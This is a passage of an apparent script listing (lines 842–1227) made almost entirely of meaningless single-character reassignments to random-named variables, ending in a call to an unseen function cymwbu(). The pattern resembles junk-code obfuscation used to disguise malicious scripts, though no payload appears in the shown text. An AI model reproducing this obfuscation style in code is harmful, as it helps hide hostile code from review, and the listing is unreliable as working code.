842 | mljpuoyfe = "B"; | |
843 | mljpuoyfe = "C"; | |
844 | mljpuoyfe = "z"; | |
845 | mljpuoyfe = "e"; | |
846 | mljpuoyfe = "k"; | |
847 | mljpuoyfe = "k"; | |
848 | mljpuoyfe = "T"; | |
849 | mljpuoyfe = "r"; | |
850 | mljpuoyfe = "j"; | |
851 | mljpuoyfe = "T"; | |
852 | mljpuoyfe = "R"; | |
853 | mljpuoyfe = "e"; | |
854 | mljpuoyfe = "T"; | |
855 | mljpuoyfe = "x"; | |
856 | mljpuoyfe = "Z"; | |
857 | mljpuoyfe = "U"; | |
858 | mljpuoyfe = "U"; | |
859 | mljpuoyfe = "\\"; | |
860 | kigtdgdk = "T"; | |
861 | kigtdgdk = "F"; | |
862 | kigtdgdk = "D"; | |
863 | kigtdgdk = "V"; | |
864 | kigtdgdk = "l"; | |
865 | kigtdgdk = "A"; | |
866 | kigtdgdk = "G"; | |
867 | kigtdgdk = "c"; | |
868 | kigtdgdk = "W"; | |
869 | kigtdgdk = "Q"; | |
870 | kigtdgdk = "d"; | |
871 | kigtdgdk = "r"; | |
872 | kigtdgdk = "C"; | |
873 | kigtdgdk = "p"; | |
874 | kigtdgdk = "k"; | |
875 | kigtdgdk = "C"; | |
876 | dixmflm = "T"; | |
877 | dixmflm = "J"; | |
878 | dixmflm = "d"; | |
879 | dixmflm = "j"; | |
880 | dixmflm = "q"; | |
881 | dixmflm = "z"; | |
882 | dixmflm = "s"; | |
883 | dixmflm = "K"; | |
884 | dixmflm = "e"; | |
885 | dixmflm = "I"; | |
886 | dixmflm = "H"; | |
887 | dixmflm = "A"; | |
888 | dixmflm = "N"; | |
889 | dixmflm = "g"; | |
890 | eeufxlccw = "f"; | |
891 | eeufxlccw = "R"; | |
892 | eeufxlccw = "V"; | |
893 | eeufxlccw = "6"; | |
894 | ebmeg = "M"; | |
895 | ebmeg = "B"; | |
896 | ebmeg = "f"; | |
897 | ebmeg = "L"; | |
898 | ebmeg = "f"; | |
899 | ebmeg = "h"; | |
900 | ebmeg = "T"; | |
901 | ebmeg = "x"; | |
902 | ebmeg = "B"; | |
903 | ebmeg = "T"; | |
904 | ebmeg = "h"; | |
905 | ebmeg = "r"; | |
906 | ebmeg = "Q"; | |
907 | ebmeg = "J"; | |
908 | ebmeg = "R"; | |
909 | ebmeg = "W"; | |
910 | ebmeg = "p"; | |
911 | ebmeg = "z"; | |
912 | ebmeg = "U"; | |
913 | ebmeg = "P"; | |
914 | ebmeg = "q"; | |
915 | ebmeg = "j"; | |
916 | ebmeg = "w"; | |
917 | ebmeg = "B"; | |
918 | ebmeg = "E"; | |
919 | ebmeg = "X"; | |
920 | ebmeg = "p"; | |
921 | ebmeg = "s"; | |
922 | ebmeg = "A"; | |
923 | ebmeg = "u"; | |
924 | ebmeg = "D"; | |
925 | ebmeg = "h"; | |
926 | ebmeg = "B"; | |
927 | ebmeg = "Q"; | |
928 | ebmeg = "C"; | |
929 | ebmeg = "J"; | |
930 | ebmeg = "Z"; | |
931 | ebmeg = "n"; | |
932 | ebmeg = "4"; | |
933 | nsnsop = "L"; | |
934 | nsnsop = "D"; | |
935 | nsnsop = "j"; | |
936 | nsnsop = "S"; | |
937 | nsnsop = "C"; | |
938 | nsnsop = "j"; | |
939 | nsnsop = "E"; | |
940 | nsnsop = "r"; | |
941 | nsnsop = "N"; | |
942 | nsnsop = "y"; | |
943 | nsnsop = "k"; | |
944 | nsnsop = "s"; | |
945 | nsnsop = "X"; | |
946 | nsnsop = "L"; | |
947 | cfagp = "w"; | |
948 | cfagp = "W"; | |
949 | cfagp = "V"; | |
950 | cfagp = "n"; | |
951 | cfagp = "l"; | |
952 | cfagp = "l"; | |
953 | cfagp = "w"; | |
954 | cfagp = "l"; | |
955 | cfagp = "a"; | |
956 | cfagp = "v"; | |
957 | cfagp = "l"; | |
958 | cfagp = "y"; | |
959 | cfagp = "Y"; | |
960 | cfagp = "y"; | |
961 | cfagp = "B"; | |
962 | cfagp = "O"; | |
963 | cfagp = "w"; | |
964 | cfagp = "V"; | |
965 | cfagp = "Y"; | |
966 | cfagp = "H"; | |
967 | cfagp = "M"; | |
968 | cfagp = "W"; | |
969 | cfagp = "j"; | |
970 | cfagp = "J"; | |
971 | cfagp = "u"; | |
972 | cfagp = "J"; | |
973 | cfagp = "E"; | |
974 | cfagp = "n"; | |
975 | cfagp = "k"; | |
976 | cfagp = "f"; | |
977 | cfagp = "k"; | |
978 | cfagp = "F"; | |
979 | cfagp = "N"; | |
980 | cfagp = "t"; | |
981 | cfagp = "j"; | |
982 | cfagp = "b"; | |
983 | cfagp = "G"; | |
984 | cfagp = "i"; | |
985 | cfagp = "e"; | |
986 | cfagp = "F"; | |
987 | cfagp = "L"; | |
988 | cfagp = "Z"; | |
989 | cfagp = "e"; | |
990 | cfagp = "&"; | |
991 | vpydvxcb = "i"; | |
992 | vpydvxcb = "j"; | |
993 | vpydvxcb = "F"; | |
994 | vpydvxcb = "p"; | |
995 | vpydvxcb = "L"; | |
996 | vpydvxcb = "Q"; | |
997 | fugrrxj = "p"; | |
998 | fugrrxj = "u"; | |
999 | fugrrxj = "R"; | |
1000 | fugrrxj = "D"; | |
1001 | fugrrxj = "K"; | |
1002 | fugrrxj = "P"; | |
1003 | fugrrxj = "Y"; | |
1004 | fugrrxj = "N"; | |
1005 | fugrrxj = "D"; | |
1006 | fugrrxj = "H"; | |
1007 | fugrrxj = "I"; | |
1008 | fugrrxj = "L"; | |
1009 | fugrrxj = "Q"; | |
1010 | fugrrxj = "W"; | |
1011 | fugrrxj = "M"; | |
1012 | fugrrxj = "w"; | |
1013 | fugrrxj = "F"; | |
1014 | fugrrxj = "A"; | |
1015 | fugrrxj = "B"; | |
1016 | fugrrxj = "K"; | |
1017 | fugrrxj = "a"; | |
1018 | fugrrxj = "r"; | |
1019 | fugrrxj = "G"; | |
1020 | fugrrxj = "R"; | |
1021 | fugrrxj = "w"; | |
1022 | fugrrxj = "x"; | |
1023 | fugrrxj = "n"; | |
1024 | fugrrxj = "g"; | |
1025 | fugrrxj = "B"; | |
1026 | fugrrxj = "G"; | |
1027 | fugrrxj = "q"; | |
1028 | fugrrxj = "Y"; | |
1029 | fugrrxj = "t"; | |
1030 | fugrrxj = "n"; | |
1031 | fugrrxj = "p"; | |
1032 | fugrrxj = "S"; | |
1033 | fugrrxj = "G"; | |
1034 | fugrrxj = "C"; | |
1035 | fugrrxj = "f"; | |
1036 | fugrrxj = "J"; | |
1037 | fugrrxj = "A"; | |
1038 | fugrrxj = "K"; | |
1039 | fugrrxj = "r"; | |
1040 | fugrrxj = "f"; | |
1041 | fugrrxj = "0"; | |
1042 | ketrumk = "e"; | |
1043 | ketrumk = "n"; | |
1044 | ketrumk = "C"; | |
1045 | ketrumk = "y"; | |
1046 | ketrumk = "X"; | |
1047 | ketrumk = "y"; | |
1048 | ketrumk = "e"; | |
1049 | ketrumk = "D"; | |
1050 | ketrumk = "Z"; | |
1051 | ketrumk = "h"; | |
1052 | ketrumk = "e"; | |
1053 | ketrumk = "z"; | |
1054 | ketrumk = "J"; | |
1055 | ketrumk = "E"; | |
1056 | ketrumk = "x"; | |
1057 | ketrumk = "k"; | |
1058 | ketrumk = "S"; | |
1059 | ketrumk = "I"; | |
1060 | ketrumk = "z"; | |
1061 | ketrumk = "i"; | |
1062 | ketrumk = "r"; | |
1063 | ketrumk = "J"; | |
1064 | ketrumk = "U"; | |
1065 | ketrumk = "q"; | |
1066 | ketrumk = "f"; | |
1067 | ketrumk = "C"; | |
1068 | ketrumk = "d"; | |
1069 | ketrumk = "q"; | |
1070 | ketrumk = "T"; | |
1071 | ketrumk = "H"; | |
1072 | ketrumk = "N"; | |
1073 | ketrumk = "l"; | |
1074 | ketrumk = "g"; | |
1075 | ketrumk = "F"; | |
1076 | ketrumk = "p"; | |
1077 | ketrumk = "E"; | |
1078 | cjyxr = "F"; | |
1079 | cjyxr = "f"; | |
1080 | cjyxr = "o"; | |
1081 | cjyxr = "u"; | |
1082 | cjyxr = "Y"; | |
1083 | cjyxr = "e"; | |
1084 | cjyxr = "k"; | |
1085 | cjyxr = "a"; | |
1086 | cjyxr = "r"; | |
1087 | necpj = "V"; | |
1088 | necpj = "s"; | |
1089 | necpj = "d"; | |
1090 | necpj = "c"; | |
1091 | necpj = "M"; | |
1092 | necpj = "W"; | |
1093 | necpj = "l"; | |
1094 | necpj = "i"; | |
1095 | necpj = "E"; | |
1096 | necpj = "U"; | |
1097 | necpj = "F"; | |
1098 | necpj = "G"; | |
1099 | necpj = "G"; | |
1100 | necpj = "N"; | |
1101 | necpj = "N"; | |
1102 | necpj = "q"; | |
1103 | necpj = "J"; | |
1104 | necpj = "S"; | |
1105 | necpj = "A"; | |
1106 | necpj = "g"; | |
1107 | necpj = "L"; | |
1108 | necpj = "v"; | |
1109 | necpj = "p"; | |
1110 | necpj = "L"; | |
1111 | necpj = "d"; | |
1112 | necpj = "i"; | |
1113 | necpj = "Q"; | |
1114 | necpj = "J"; | |
1115 | necpj = "q"; | |
1116 | necpj = "j"; | |
1117 | necpj = "x"; | |
1118 | necpj = "W"; | |
1119 | necpj = "R"; | |
1120 | necpj = "D"; | |
1121 | necpj = "/"; | |
1122 | hogvds = "D"; | |
1123 | hogvds = "s"; | |
1124 | hogvds = "r"; | |
1125 | hogvds = "d"; | |
1126 | hogvds = "x"; | |
1127 | hogvds = "y"; | |
1128 | hogvds = "E"; | |
1129 | hogvds = "g"; | |
1130 | hogvds = "G"; | |
1131 | hogvds = "D"; | |
1132 | hogvds = "d"; | |
1133 | hogvds = "o"; | |
1134 | hogvds = "Z"; | |
1135 | hogvds = "V"; | |
1136 | hogvds = "f"; | |
1137 | hogvds = "p"; | |
1138 | hogvds = "o"; | |
1139 | hogvds = "l"; | |
1140 | hogvds = "H"; | |
1141 | hogvds = "f"; | |
1142 | hogvds = "u"; | |
1143 | hogvds = "O"; | |
1144 | hogvds = "D"; | |
1145 | hogvds = "A"; | |
1146 | hogvds = "M"; | |
1147 | hogvds = "G"; | |
1148 | hogvds = "w"; | |
1149 | hogvds = "Y"; | |
1150 | hogvds = "8"; | |
1151 | gksrzrwrz = "l"; | |
1152 | gksrzrwrz = "A"; | |
1153 | gksrzrwrz = "q"; | |
1154 | gksrzrwrz = "f"; | |
1155 | gksrzrwrz = "L"; | |
1156 | gksrzrwrz = "w"; | |
1157 | gksrzrwrz = "P"; | |
1158 | gksrzrwrz = "A"; | |
1159 | gksrzrwrz = "b"; | |
1160 | gksrzrwrz = "N"; | |
1161 | gksrzrwrz = "k"; | |
1162 | gksrzrwrz = "k"; | |
1163 | gksrzrwrz = "g"; | |
1164 | gksrzrwrz = "Q"; | |
1165 | gksrzrwrz = "C"; | |
1166 | gksrzrwrz = "v"; | |
1167 | gksrzrwrz = "m"; | |
1168 | gksrzrwrz = "R"; | |
1169 | qujxai = "V"; | |
1170 | qujxai = "n"; | |
1171 | qujxai = "A"; | |
1172 | qujxai = "c"; | |
1173 | qujxai = "a"; | |
1174 | qujxai = "u"; | |
1175 | qujxai = "x"; | |
1176 | fdwbbl = "t"; | |
1177 | fdwbbl = "F"; | |
1178 | fdwbbl = "Q"; | |
1179 | fdwbbl = "O"; | |
1180 | fdwbbl = "K"; | |
1181 | fdwbbl = "q"; | |
1182 | fdwbbl = "x"; | |
1183 | fdwbbl = "k"; | |
1184 | fdwbbl = "c"; | |
1185 | fdwbbl = "T"; | |
1186 | fdwbbl = "R"; | |
1187 | fdwbbl = "t"; | |
1188 | fdwbbl = "g"; | |
1189 | fdwbbl = "P"; | |
1190 | fonnevso = "s"; | |
1191 | fonnevso = "n"; | |
1192 | fonnevso = "m"; | |
1193 | fonnevso = "a"; | |
1194 | fonnevso = "I"; | |
1195 | fonnevso = "L"; | |
1196 | fonnevso = "i"; | |
1197 | fonnevso = "V"; | |
1198 | fonnevso = "Z"; | |
1199 | fonnevso = "M"; | |
1200 | fonnevso = "X"; | |
1201 | fonnevso = "i"; | |
1202 | fonnevso = "j"; | |
1203 | fonnevso = "F"; | |
1204 | fonnevso = "N"; | |
1205 | fonnevso = "Z"; | |
1206 | fonnevso = "v"; | |
1207 | fonnevso = "P"; | |
1208 | fonnevso = "l"; | |
1209 | fonnevso = "h"; | |
1210 | fonnevso = "N"; | |
1211 | fonnevso = "r"; | |
1212 | fonnevso = "y"; | |
1213 | fonnevso = "p"; | |
1214 | fonnevso = "o"; | |
1215 | fonnevso = "l"; | |
1216 | fonnevso = "U"; | |
1217 | fonnevso = "n"; | |
1218 | fonnevso = "X"; | |
1219 | fonnevso = "v"; | |
1220 | fonnevso = "d"; | |
1221 | fonnevso = "N"; | |
1222 | fonnevso = "r"; | |
1223 | fonnevso = "A"; | |
1224 | fonnevso = "G"; | |
1225 | fonnevso = "U"; | |
1226 | fonnevso = "@"; | |
1227 | cymwbu ( ); |
|